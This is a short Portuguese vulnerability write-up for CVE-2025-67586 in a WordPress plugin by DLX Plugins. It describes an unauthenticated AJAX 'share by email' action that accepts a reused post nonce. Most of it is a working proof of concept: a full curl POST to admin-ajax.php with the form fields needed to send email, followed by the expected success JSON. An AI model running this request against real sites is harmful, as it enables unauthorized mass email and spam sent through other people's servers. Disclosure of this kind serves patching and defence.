
writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
Relatórios para (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 Exploit PoC --------------
==> Descrição Uma vulnerabilidade de controle de acesso quebrado existe em um plugin WordPress desenvolvido por DLX Plugins. O plugin expõe uma ação AJAX não autenticada que permite que atacantes abusem da funcionalidade "Compartilhar por E-mail" sem as devidas verificações de permissão.
Um atacante não autenticado pode reutilizar um nonce de post válido para disparar solicitações de compartilhamento por e-mail, resultando em envio não autorizado de e-mails (spam / abuso de e-mail) sem autenticação do usuário.
==> Privilégios Necessários Nenhum (Não autenticado)
==> Prova de Conceito (PoC)
Etapa 1: Escolha um site com o Plugin Instalado
Etapa 2: Obter um Nonce Válido
Etapa 3: Explorar via Requisição Não Autenticada
comando bash: (substitua a URL do site, a URL do post e o nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> Resposta JSON esperada:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }